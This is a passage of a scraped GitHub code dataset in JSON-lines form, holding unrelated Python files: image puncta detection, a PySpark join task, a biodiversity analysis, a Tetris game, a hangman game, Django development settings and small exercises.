\"uint8\")\n\n for i,soma_instance in enumerate(self.somas):\n lsm_img = np.zeros(np.shape(orig_img), \"uint8\")\n\n xs = soma_instance[:, 0]\n ys = soma_instance[:, 1]\n\n rr, cc = polygon(ys, xs, lsm_img.shape)\n lsm_img[rr, cc] = 1\n\n anti_soma = np.multiply(anti_soma, 1 - lsm_img)\n soma_img = np.multiply(orig_img, lsm_img)\n t = np.max(orig_img[rr,cc])*self.soma_thresh\n blobs_log = blob_log(soma_img, threshold=t,max_sigma=1)\n blobs_log[:, 2] = blobs_log[:, 2] * sqrt(2)\n\n for blob in blobs_log:\n y, x, r = blob\n puncta_stats = self.GetPunctaStats(x, y, r, orig_img)\n sp = Puncta([x,y],r,puncta_stats,False,0,i,ch,t_snape)\n somatic_puncta.append(sp)\n\n return somatic_puncta,anti_soma\n\n def GetPunctasDend(self,orig_img,anti_soma,ch,t_snape):\n\n \"\"\"Detects and returns dendritic puncta in the given image.\n\n Performs puncta detection on the dendrite regions of the image and returns the detected puncta.\n\n Args:\n orig_img: The original image in which puncta are to be detected.\n anti_soma: The anti-soma image obtained by subtracting soma regions from the original image.\n\n Returns:\n dendritic_puncta: A list of Puncta objects representing the detected dendritic puncta.\n \"\"\"\n\n dendritic_puncta = []\n lsm_img = np.zeros(np.shape(orig_img), \"uint8\")\n\n dendrite_img = np.zeros(np.shape(orig_img), \"uint8\")\n dilated = np.zeros(np.shape(orig_img), \"uint8\")\n\n for i,dendrite_instance in enumerate(self.dendrites):\n dilated = dendrite_instance.get_dendritic_surface_matrix()\n dilated = np.multiply(anti_soma, dilated)\n xy = GetAllpointsonPath(dendrite_instance.control_points)[:, :]\n xs = xy[:, 0]\n ys = xy[:, 1]\n ## uncomment if you don't want to repeat dendritic punctas in overlapping dendritic parts\n # anti_soma = np.multiply(anti_soma,1 - dilated)\n dend_img = np.multiply(dilated, orig_img)\n filtered_dend_img = dend_img[np.nonzero(dend_img)]\n t = np.quantile(filtered_dend_img, self.dend_thresh)\n dend_blobs_log = blob_log(dend_img, threshold=t,max_sigma=1)\n dend_blobs_log[:, 2] = dend_blobs_log[:, 2] * sqrt(2)\n dp = []\n for blob in dend_blobs_log:\n y, x, r = blob\n on_dendrite, distance_from_origin = self.Is_On_Dendrite(\n [xs, ys], [x, y], dendrite_instance.dend_stat[:,2].max()\n )\n puncta_stats = self.GetPunctaStats(x, y, r, orig_img)\n dp = Puncta([x,y],r,puncta_stats,on_dendrite,distance_from_origin,i,ch,t_snape)\n dendritic_puncta.append(dp)\n\n return dendritic_puncta\n\ndef save_puncta(puncta_Dir,punctas,xLims):\n \"\"\"Saves the detected puncta to files.\n\n This method creates a directory for puncta files and subdirectories for different parameters.\n It retrieves the current slider values for half width, dendritic threshold, and somatic threshold.\n The somatic and dendritic punctas are obtained from the punctas list and flattened.\n The somatic punctas are saved to a JSON file under the 'soma_puncta.json' filename.\n The dendritic punctas are saved to a JSON file under the 'dend_puncta.json' filename.\n Both files are stored in the corresponding subdirectory of the puncta directory.\n \"\"\"\n \n if(len(xLims[0])==0):\n Lims = np.array(0)\n else:\n Lims = np.array([xLims[0][0],xLims[1][0]])\n\n somatic_punctas,dendritic_punctas = punctas[0],punctas[1]\n somatic_punctas_flat = [item for sublist in somatic_punctas for subsublist in sublist for item in (subsublist if isinstance(subsublist, list) else [subsublist])]\n dendritic_punctas_flat = [item for sublist in dendritic_punctas for subsublist in sublist for item in (subsublist if isinstance(subsublist, list) else [subsublist])]\n try:\n for sp in somatic_punctas_flat:\n sp.location = (location - Lims).tolist()\n except:\n pass\n try:\n for dp in dendritic_punctas_flat:\n dp.location = (location - Lims).tolist()\n except:\n pass\n\n with open(\n puncta_Dir + \"soma_puncta.json\",\n \"w\",\n ) as f:\n json.dump([vars(P) for P in somatic_punctas_flat], f, indent=4)\n with open(\n puncta_Dir + \"dend_puncta.json\",\n \"w\",\n ) as f:\n json.dump([vars(P) for P in dendritic_punctas_flat], f, indent=4)\n\n PunctaSave_csv(puncta_Dir,somatic_punctas_flat,dendritic_punctas_flat)\n\ndef PunctaSave_csv(Dir,somatic_punctas_flat,dendritic_punctas_flat):\n \"\"\"\n Saves somatic and dendritic puncta data to separate CSV files.\n\n Args:\n Dir (str): Directory path where the CSV files will be saved.\n somatic_punctas_flat (list): List of somatic puncta objects.\n dendritic_punctas_flat (list): List of dendritic puncta objects.\n\n Returns:\n None\n \"\"\"\n custom_header = ['','channel','snapshot','location','radius','max','min','mean','std','median','distance']\n\n csv_file_path = Dir+'soma_puncta.csv'\n with open(csv_file_path, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(custom_header) \n for i,p in enumerate(somatic_punctas_flat):\n row = ['Puncta: '+str(i),p.channel,p.snapshot,str(p.location),\n p.radius,p.max,p.min,p.mean,p.std,p.median,p.distance]\n writer.writerow(row)\n\n csv_file_path = Dir+'dend_puncta.csv'\n with open(csv_file_path, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(custom_header) \n for i,p in enumerate(dendritic_punctas_flat):\n row = ['Puncta: '+str(i),p.channel,p.snapshot,str(p.location),\n p.radius,p.max,p.min,p.mean,p.std,p.median,p.distance]\n writer.writerow(row)\n","repo_name":"phil-fill/SpyDen","sub_path":"App/PunctaDetection.py","file_name":"PunctaDetection.py","file_ext":"py","file_size_in_byte":14480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2797610071","text":"from requests.utils import cookiejar_from_dict\n\n\nfrom http.cookies import SimpleCookie\nfrom requests.utils import cookiejar_from_dict\n\n### HELP FUNCTION ###\ndef parse_cookie_string(cookie_string):\n cookie = SimpleCookie()\n cookie.load(cookie_string)\n cookies_dict = {}\n cookiejar = None\n for k, m in cookie.items():\n cookies_dict[k] = m.value\n cookiejar = cookiejar_from_dict(cookies_dict,\n cookiejar=None,\n overwrite=True)\n return cookiejar\n\n","repo_name":"onewesong/MiService","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"7835100256","text":"# В датафреймах (pyspark.sql.DataFrame) заданы продукты, категории и связь\n# между ними. Одному продукту может соответствовать много категорий,\n# в одной категории может быть много продуктов. Напишите метод с помощью\n# PySpark, который вернет все продукты с их категориями (датафрейм с\n# набором всех пар «Имя продукта – Имя категории»). В результирующем\n# датафрейме должны также присутствовать продукты, у которых нет категорий.\n\nfrom pyspark.sql import SparkSession, DataFrame\n\n\nspark = SparkSession.builder.appName(\"dataframes_task\").getOrCreate()\n\ncategories_table = spark.createDataFrame([\n (1, \"Category 1\"),\n (2, \"Category 2\"),\n (3, \"Category 3\"),\n (4, \"Category 4\"),\n (5, \"Category 5\"),\n (6, \"Category 6\"),],\n [\"id\", \"category_name\"],\n)\n\nproducts_table = spark.createDataFrame([\n (1, \"Product 1\"),\n (2, \"Product 2\"),\n (3, \"Product 3\"),\n (4, \"Product 4\"),\n (5, \"Product 5\"),\n (6, \"Product 6\"),\n (7, \"Product 7\"),\n (8, \"Product 8\"),\n (9, \"Product 9\"),\n (10, \"Product 10\"), ],\n [\"id\", \"product_name\", ]\n)\n\n\nER_table_products_vs_categories = spark.createDataFrame([\n (1, 1),\n (2, 3),\n (3, 2),\n (3, 4),\n (6, 4),\n (4, 5),\n (5, 6),\n (6, 7),\n (6, 8),\n (4, 2),\n (1, 8),\n (4, 9),\n (1, 10)],\n [\"category_id\", \"product_id\", ]\n)\n\n\n\n\ndf_data = (products_table.join(ER_table_products_vs_categories,\n products_table.id == ER_table_products_vs_categories.product_id, how='left')\n .join(categories_table,\n ER_table_products_vs_categories.category_id == categories_table.id, how='left')\n .select(['category_name', 'product_name'])\n)\n\ndf_data.orderBy(\"category_id\", \"product_id\", ).show(truncate=True)\n\n# впервые сегодня узнал о pySpark в вашем ТЗ, надеюсь это покажет что я могу\n# быстро разобраться в новой для себя теме, без чужых указок, гугл мне поможет).","repo_name":"kireev20000/MindBox_Test_Task","sub_path":"task_2_pyspark_DataFrame.py","file_name":"task_2_pyspark_DataFrame.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74034213673","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\nspecies = pd.read_csv('species_info.csv')\n# print(species.head())\n\n# number of different species\nspecies_count = species.scientific_name.nunique()\n# print(species_count)\n\n# different category\nspecies_type = species.category.unique()\n# print(species_type)\n\n# different conservation status\nconservation_statuses = species.conservation_status.unique()\n# print(conservation_statuses)\n\n# Analyze Species Conservation Status\nconservation_counts = species.groupby('conservation_status').scientific_name.nunique().reset_index()\n# print(conservation_counts)\n\nspecies.fillna('No Intervention', inplace = True)\nconservation_counts_fixed = species.groupby('conservation_status').scientific_name.nunique().reset_index()\n# print(conservation_counts_fixed)\n\n# Plotting Conservation Status by Species\nspecies.fillna('No Intervention', inplace = True)\nprotection_counts = species.groupby('conservation_status') \\\n .scientific_name.nunique() \\\n .reset_index().sort_values(by='scientific_name')\n\n# num_species = protection_counts.scientific_name\n# status = protection_counts.conservation_status\n\n# plt.figure(figsize=(10, 4))\n# ax = plt.subplot()\n# plt.bar(range(len(num_species)), num_species)\n# ax.set_xticks(range(len(status)))\n# ax.set_xticklabels(status)\n# plt.xlabel('Conservation Status')\n# plt.ylabel('Number of Species')\n# plt.title('Conservation Status by Species')\n# plt.show()\n\nspecies['is_protected'] = species.conservation_status \\\n .apply(lambda status: True\n if status != 'No Intervention'\n else False)\ncategory_counts = species.groupby(['category', 'is_protected']) \\\n .scientific_name.nunique().reset_index()\n# print(category_counts)\n\ncategory_pivot = category_counts.pivot(\n columns = 'is_protected',\n index = 'category',\n values = 'scientific_name').reset_index()\ncategory_pivot.columns = ['category', 'not_protected', 'protected']\n# print(category_pivot)\n\ncategory_pivot['percent_protected'] = category_pivot.protected / (category_pivot.protected + category_pivot.not_protected)\nprint(category_pivot)\n\nfrom scipy.stats import chi2_contingency\n\ncontingency_bird_mammal = [[category_pivot.iat[3,2], category_pivot.iat[3,1]],\n [category_pivot.iat[1,2], category_pivot.iat[1,1]]]\n\n\npval_bird_mammal = chi2_contingency(contingency_bird_mammal)[1]\nprint('{:.2f}%'.format(pval_bird_mammal*100))\n\ncontingency_reptile_mammal = [[category_pivot.iat[3,2], category_pivot.iat[3,1]],\n [category_pivot.iat[5,2], category_pivot.iat[5,1]]]\npval_reptile_mammal = chi2_contingency(contingency_reptile_mammal)[1]\nprint('{:.2f}%'.format(pval_reptile_mammal*100))\n","repo_name":"LucasBoTang/Codecademy_Introduction_to_Data_Analysis","sub_path":"final_project_biodiversity/01endangered_species.py","file_name":"01endangered_species.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32656693406","text":"# -*- coding: UTF-8 -*-\n\"\"\":mod:`cumulative.py` is used to compute cumulative returns; also known as\nmomentum.\n\"\"\"\nfrom datetime import datetime, timedelta\n\ndef ret(data):\n \"\"\" Computes the cumulative returns (momentum) of a security.\n\n Parameters:\n - `data` : :class:`list` of :class:`tuples`\n\n .. note::\n The function argument is built by :py:func:`api.tsd`, it is\n structured as follow: ``[(datetime.datetime(2019, 4, 18, 0, 0), 203.86)]`` .\n\n The function uses :mod:`datetime` to determine the dates between which\n the momentum shall be calculated. A new :class:`list` containing only the\n values in the right time frame is built and passed to\n :py:func:`cumulative.momentum`.\n\n Returns the momentum of the security (:class:`float`)\n \"\"\"\n vector = []\n today = datetime.today()\n delta1 = timedelta(weeks = 8)\n delta2 = timedelta(weeks = 52)\n two_m = today - delta1\n one_y = today - delta2\n # filters the list according to the date of the closing value\n for item in data:\n if item[0] <= two_m and item[0] >= one_y:\n vector.append(item[1])\n # computes the cumulative returns for the filtered list\n cmr = momentum(vector)\n return cmr\n\ndef momentum(vector):\n \"\"\" Computes the momentum of a vector.\n\n Parameters:\n - `vector` : :class:`list` of :class:`floats`\n\n Moentum is computed as follow:\n - momentum = 100*(new - old)/old\n\n Returns the momentum of the vector (:class:`float`)\n \"\"\"\n return 100*((vector[0] - vector[-1])/vector[-1])\n","repo_name":"epfeff/smartbetas","sub_path":"smartbetas/cumulative.py","file_name":"cumulative.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"6718215002","text":"from src.get_data.lee_ree import consulta_ree_hour\nfrom src.get_data.analisis_ree import widget_caract \nfrom dotenv import load_dotenv\nimport datetime as dt\nimport sys\nsys.path.insert(1, '../')\nfrom src.connect_db import client_influx\n\ndef main():\n # funcion para leer de REE de la API que no necesita KEY esta función pide \n # el intervalo de importación y luego llama a la lectura por horas de \n # lee_ree y escribe en la base de datos influx\n\n diff=dt.timedelta(days=15)\n data_ini=dt.datetime(*pregunta_fecha(\"begins\"),0,0)\n data_fin=dt.datetime(*pregunta_fecha(\"ends\"),0,0)\n while data_fin>data_ini:\n data_fin_sample=data_ini+diff\n if data_fin_sample>data_fin:\n data_fin_sample=data_fin\n\n print('*** probando a consultar de REE de ',data_ini, \" a \", data_fin_sample )\n data=consulta_ree_hour('demanda','demanda-tiempo-real',data_ini,data_fin_sample)\n if data==False:\n print('Error consultando datos')\n return False\n print('*** probando a escribir de ',data_ini, \" a \", data_fin_sample )\n escribe_influx('demanda-real',data[0]['attributes']['values'])\n escribe_influx('demanda-programada',data[1]['attributes']['values'])\n escribe_influx('demanda-prevista',data[2]['attributes']['values'])\n\n data_ini=data_fin_sample\n\n print('*** termina escritura en db_influx de la demanda-tiempo-real ***')\n client_influx.close()\n\ndef escribe_influx(table,values):\n # escribe en influx, la tabla es una cadena de caracteres con el nombre de los datos \n # los valores son diccionarios con fechas/hora y valores en porcentaje\n \n write_api = client.write_api(write_options=SYNCHRONOUS)\n data = \"mem,host=host1 used_percent=23.43234543\"\n write_api.write(bucket, org, data)\n \n dbs=client_influx.get_list_database()\n dbs_list=[]\n if not isinstance(dbs,list):\n for key, value in dbs.iteritems():\n dbs_list.append([value])\n\n if 'db_ereal' not in dbs_list:\n client_influx.create_database('db_ereal')\n\n client_influx.switch_database('db_ereal')\n\n for value in values:\n P=Point(\"\")\n write_api(buket=\"ereal\", record=P)\n client_influx.write_points(json_body)\n\ndef pregunta_fecha(pregunta):\n check=False\n while check==False:\n var=input(\" InfluxDB process - Please introduce the date when the importation \" + pregunta + \" [YYYY/MM/DD] (i.e 2020/10/01):\").split(\"/\")\n try:\n var=[int(e) for e in var]\n except ValueError:\n \"Please introduce a valid date\"\n\n if sum([isinstance(e,int) for e in var])==3:\n if var[0]>2019 and var[0]<=dt.datetime.now().year:\n try:\n dt.datetime(year=var[0],month=var[1],day=var[2])\n check=True\n except ValueError:\n \"Please introduce a valid date\"\n pass\n return var\n\n\n\n\n\n\nif __name__==\"__main__\":\n main()\n","repo_name":"yuvtorres/energia-real","sub_path":"src/get_data/carga_influx.py","file_name":"carga_influx.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4420355285","text":"import random\nimport pygame\nimport sys\n\nclass Panel(object): \n rect_arr=[] \n moving_block=None \n def __init__(self, bg, block_size, position):\n self._bg=bg\n self._x,self._y,self._width,self._height=position\n self._block_size=block_size\n self._bgcolor=[0,0,0]\n \n def add_block(self,block):\n for rect in block.get_rect_arr():\n self.rect_arr.append(rect)\n\n def change_block(self):\n if self.moving_block:\n new_arr = self.moving_block.change()\n if new_arr and not self.check_overlap(0, 0, check_arr=new_arr): \n self.moving_block.rect_arr=new_arr\n\n def create_move_block(self):\n block = create_block()\n block.move(5-2,-2) \n self.moving_block=block\n\n def check_overlap(self, diffx, diffy, check_arr=None):\n if check_arr is None: check_arr = self.moving_block.get_rect_arr()\n for x,y in check_arr:\n for rx,ry in self.rect_arr:\n if x+diffx==rx and y+diffy==ry:\n return True\n return False\n\n def control_block(self, diffx, diffy):\n if self.moving_block.can_move(diffx,diffy) and not self.check_overlap(diffx, diffy):\n self.moving_block.move(diffx,diffy)\n\n def check_clear(self):\n pass\n\n def move_block(self):\n if self.moving_block is None: create_move_block()\n if self.moving_block.can_move(0,1) and not self.check_overlap(0,1): \n self.moving_block.move(0,1)\n else:\n self.add_block(self.moving_block)\n self.check_clear()\n self.create_move_block()\n\n def paint(self):\n mid_x=self._x+self._width/2\n pygame.draw.line(self._bg,self._bgcolor,[mid_x,self._y],[mid_x,self._y+self._height],self._width) \n \n # 绘制已经落底下的方块\n bz=self._block_size\n for rect in self.rect_arr:\n x,y=rect\n pygame.draw.line(self._bg,[0,0,255],[self._x+x*bz+bz/2,self._y+y*bz],[self._x+x*bz+bz/2,self._y+(y+1)*bz],bz)\n pygame.draw.rect(self._bg,[255,255,255],[self._x+x*bz,self._y+y*bz,bz+1,bz+1],1)\n \n # 绘制正在落下的方块\n if self.move_block:\n for rect in self.moving_block.get_rect_arr():\n x,y=rect\n pygame.draw.line(self._bg,[0,0,255],[self._x+x*bz+bz/2,self._y+y*bz],[self._x+x*bz+bz/2,self._y+(y+1)*bz],bz)\n pygame.draw.rect(self._bg,[255,255,255],[self._x+x*bz,self._y+y*bz,bz+1,bz+1],1)\n\n\nclass Block(object):\n sx=0\n sy=0\n def __init__(self):\n self.rect_arr=[]\n\n def get_rect_arr(self): \n return self.rect_arr\n\n def move(self,xdiff,ydiff): \n self.sx+=xdiff\n self.sy+=ydiff\n self.new_rect_arr=[]\n for x,y in self.rect_arr:\n self.new_rect_arr.append((x+xdiff,y+ydiff))\n self.rect_arr=self.new_rect_arr\n\n def can_move(self,xdiff,ydiff):\n for x,y in self.rect_arr:\n if y+ydiff>=20: return False\n if x+xdiff<0 or x+xdiff>=10: return False\n return True\n \n def change(self):\n self.shape_id+=1\n if self.shape_id >= self.shape_num:\n self.shape_id=0\n \n arr = self.get_shape()\n new_arr = []\n for x,y in arr:\n if x+self.sx<0 or self.sx>=10:\n self.shape_id -= 1\n if self.shape_id < 0:\n self.shape_id = self.shape_num - 1\n return None\n\n new_arr.append([x+self.sx, y+self.sy])\n\n return new_arr\n\n\nclass LongBlock(Block):\n shape_id=0\n shape_num=2\n def __init__(self, n=None): \n super(LongBlock, self).__init__()\n if n is None: n=random.randint(0,1)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(1,0),(1,1),(1,2),(1,3)] \n else: return [(0,2),(1,2),(2,2),(3,2)]\n\nclass SquareBlock(Block): \n shape_id=0\n shape_num=1\n def __init__(self, n=None):\n super(SquareBlock, self).__init__()\n self.rect_arr=[(1,1),(1,2),(2,1),(2,2)]\n\n def get_shape(self):\n return self.rect_arr\n\nclass ZBlock(Block): \n shape_id=0\n shape_num=2\n def __init__(self, n=None):\n super(ZBlock, self).__init__()\n if n is None: n=random.randint(0,1)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n \n def get_shape(self):\n if self.shape_id==0: \n return [(2,0),(2,1),(1,1),(1,2)]\n else:\n return [(0,1),(1,1),(1,2),(2,2)]\n\n\nclass SBlock(Block): \n shape_id=0\n shape_num=2\n def __init__(self, n=None):\n super(SBlock, self).__init__()\n if n is None: n=random.randint(0,1)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0:\n return [(1,0),(1,1),(2,1),(2,2)] \n else:\n return [(0,2),(1,2),(1,1),(2,1)]\n\nclass LBlock(Block): \n shape_id=0\n shape_num=4\n def __init__(self, n=None):\n super(LBlock, self).__init__()\n if n is None: n=random.randint(0,3)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(1,0),(1,1),(1,2),(2,2)]\n elif self.shape_id==1: return [(0,1),(1,1),(2,1),(0,2)]\n elif self.shape_id==2: return [(0,0),(1,0),(1,1),(1,2)]\n else: return [(0,1),(1,1),(2,1),(2,0)]\n\nclass JBlock(Block): \n shape_id=0\n shape_num=4\n def __init__(self, n=None):\n super(JBlock, self).__init__()\n if n is None: n=random.randint(0,3)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(1,0),(1,1),(1,2),(0,2)]\n elif self.shape_id==1: return [(0,1),(1,1),(2,1),(0,0)]\n elif self.shape_id==2: return [(2,0),(1,0),(1,1),(1,2)]\n else: return [(0,1),(1,1),(2,1),(2,2)]\n\nclass TBlock(Block): \n shape_id=0\n shape_num=4\n def __init__(self, n=None):\n super(TBlock, self).__init__()\n if n is None: n=random.randint(0,3)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(0,1),(1,1),(2,1),(1,2)]\n elif self.shape_id==1: return [(1,0),(1,1),(1,2),(0,1)]\n elif self.shape_id==2: return [(0,1),(1,1),(2,1),(1,0)]\n else: return [(1,0),(1,1),(1,2),(2,1)]\n \n\ndef create_block():\n n = random.randint(0,19)\n if n==0: return SquareBlock(n=0)\n elif n==1 or n==2: return LongBlock(n=n-1)\n elif n==3 or n==4: return ZBlock(n=n-3)\n elif n==5 or n==6: return SBlock(n=n-5)\n elif n>=7 and n<=10: return LBlock(n=n-7)\n elif n>=11 and n<=14: return JBlock(n=n-11)\n else: return TBlock(n=n-15)\n\nif __name__ == '__main__':\n pygame.init()\n space=30\n main_block_size=30\n main_panel_width=main_block_size*10\n main_panel_height=main_block_size*20\n screencaption = pygame.display.set_caption('Tetris')\n screen = pygame.display.set_mode((main_panel_width+160+space*3,main_panel_height+space*2))\n main_panel=Panel(screen,main_block_size,[space,space,main_panel_width,main_panel_height])\n\n pygame.key.set_repeat(200, 30)\n main_panel.create_move_block()\n\n diff_ticks = 300 \n ticks = pygame.time.get_ticks() + diff_ticks\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a: main_panel.control_block(-1,0)\n if event.key == pygame.K_d: main_panel.control_block(1,0)\n if event.key == pygame.K_q: main_panel.change_block()\n if event.key == pygame.K_s: main_panel.control_block(0,1)\n \n screen.fill((100,100,100)) \n main_panel.paint() \n\n pygame.display.update() \n\n if pygame.time.get_ticks() >= ticks:\n ticks+=diff_ticks\n main_panel.move_block()\n\n","repo_name":"wma8/workbench","sub_path":"Games/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":8102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38691409892","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 30 23:25:35 2021\n\n@author: admin\n\"\"\"\n\nfrom visual_dictionary import lives_visual_dict\n \n \n\nword = \"ozkancondeka\" # Pick a word at the beginning.\nre = len(word)*\"_ \"\nstr_out = []\nls = []\nls2=list(\"-\"*len(word))\nc = 1\n \nprint(\"Welcome to HANGMAN-GAME.\\nYou need to enter a letter! \")\nwhile c <= len(lives_visual_dict)+1:\n ch = input(\"Type a letter: \")\n \n if ch in word:\n print(f\"Correct! {ch} is in word {word.count(ch)} times.\")\n for x in word:\n if x == ch:\n ls.append(ch)\n else:\n ls.append(\"-\")\n str_out.append(ls)\n ls = []\n \n for i in range(len(str_out[0])):\n for j in range(len(str_out)):\n if str_out[j][i] != \"-\":\n ls2[i]=str_out[j][i]\n \n \n print(\"\".join(ls2))\n \n \n \n \n # word = word.replace(ch,\"\",word.count(ch)) \n \n c -= 1\n \n if \"\".join(ls2) == word:\n print(\"You win!!\")\n break\n \n \n else:\n result = lives_visual_dict[len(lives_visual_dict)-c]\n print(f\"{ch} not in word. You have {len(lives_visual_dict)-c} more wrong right.\")\n print(\"\".join(ls2))\n print(result)\n \n if result == lives_visual_dict[0]:\n \n print(\"You losed!!!\") \n break\n c+=1\n \n \n \n \n \n ","repo_name":"ozkancondek/clarusway_python","sub_path":"my_projects/hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73109517363","text":"from .base import * # noqa\nfrom .base import env\n\n# GENERAL\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\nSECRET_KEY = env(\n \"DJANGO_SECRET_KEY\",\n default=\"NttXndNmgnudwb1d7z683YBcJqtItrWhtWiGMGrI0aQYdt39LEDRJLSfRywhUcWx\",\n)\n# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts\nWEBHOOK_URL = env(\n \"WEBHOOK_URL\",\n default=\"error\",\n) # Telegram webhook url\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\", \"easynote\", WEBHOOK_URL.split('//')[1]]\n\n# CACHES\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#caches\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n \"LOCATION\": \"\",\n }\n}\n\n# EMAIL\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#email-host\nEMAIL_HOST = env(\"EMAIL_HOST\", default=\"mailhog\")\n# https://docs.djangoproject.com/en/dev/ref/settings/#email-port\nEMAIL_PORT = 1025\n\n# WhiteNoise\n# ------------------------------------------------------------------------------\n# http://whitenoise.evans.io/en/latest/django.html#using-whitenoise-in-development\nINSTALLED_APPS = [\"whitenoise.runserver_nostatic\"] + INSTALLED_APPS # noqa F405\n\nDEBUG_APP = list()\nDEBUG_APP += ['django-silk']\n#DEBUG_APP += ['django-debug-toolbar']\n#DEBUG_APP += ['django-queryinspect']\n\n# django-silk\n# ------------------------------------------------------------------------------\n# https://github.com/jazzband/django-silk\nif 'django-silk' in DEBUG_APP:\n INSTALLED_APPS += [\"silk\"]\n MIDDLEWARE += [\"silk.middleware.SilkyMiddleware\"]\n SILKY_ANALYZE_QUERIES = True\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#prerequisites\nif 'django-debug-toolbar' in DEBUG_APP:\n INSTALLED_APPS += [\"debug_toolbar\"] # noqa F405\n # https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#middleware\n MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa F405\n # https://django-debug-toolbar.readthedocs.io/en/latest/configuration.html#debug-toolbar-config\n DEBUG_TOOLBAR_CONFIG = {\n \"DISABLE_PANELS\": [\"debug_toolbar.panels.redirects.RedirectsPanel\"],\n \"SHOW_TEMPLATE_CONTEXT\": True,\n }\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#internal-ips\nINTERNAL_IPS = [\"127.0.0.1\", \"10.0.2.2\"]\nif env(\"USE_DOCKER\") == \"yes\":\n import socket\n\n hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\n INTERNAL_IPS += [\".\".join(ip.split(\".\")[:-1] + [\"1\"]) for ip in ips]\n\n# django-extensions\n# ------------------------------------------------------------------------------\n# https://django-extensions.readthedocs.io/en/latest/installation_instructions.html#configuration\nINSTALLED_APPS += [\"django_extensions\"] # noqa F405\n# Celery\n# ------------------------------------------------------------------------------\n# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-eager-propagates\nCELERY_TASK_EAGER_PROPAGATES = True\n# Your stuff...\n# ------------------------------------------------------------------------------\n\n# django-queryinspect\n# https://github.com/dobarkod/django-queryinspect\nif 'django-queryinspect' in DEBUG_APP:\n QUERY_INSPECT_ENABLED = True\n QUERY_INSPECT_LOG_QUERIES = True\n QUERY_INSPECT_LOG_TRACEBACKS = True\n QUERY_INSPECT_LOG_STATS = True\n MIDDLEWARE += (\n 'qinspect.middleware.QueryInspectMiddleware',\n )\n LOGGING['loggers'] = {\n 'qinspect': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n }\n","repo_name":"ghostforpy/bonds-docker","sub_path":"config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33428825548","text":"# 5097. [파이썬 S/W 문제해결 기본] 6일차 - 회전\n\n\n# ############################################\n# using queue:\n\nimport sys\nsys.stdin = open('input5097.txt', 'r')\n\ndef enQueue(item):\n global Q, rear\n rear += 1\n Q[rear] = item\n\ndef deQueue():\n global Q, front\n front += 1\n return Q[front]\n\nfor T in range(int(input())):\n N, M = map(int, input().split())\n num = input().split()\n\n Q = [0] * (M + N)\n front = rear = -1\n for i in range(N):\n enQueue(num[i])\n for _ in range(M):\n tmp = deQueue()\n enQueue(tmp)\n\n print(f\"#{T+1} {Q[front+1]}\")\n\n\n\n\n\n###########################################\n# for T in range(int(input())):\n# N, M = map(int, input().split())\n# num = input().split()\n# M = M % N\n# print(f\"#{T+1} {num[M]}\")","repo_name":"jiwonjulietyoon/Algorithm","sub_path":"Tasks/1_IM/190226-1.py","file_name":"190226-1.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17709054664","text":"\"\"\"\nHow Bootcamps - Stone - /código[s]\nAutor: Henrique Junqueira Branco\n\nEnunciado: \nSendo H = 1 + 1/2 + 1/3 + 1/4 + ... + 1/N, faça um programa que calcule o valor de H com N termos.\n\"\"\"\n\nN = int(input(\"Digite o valor de 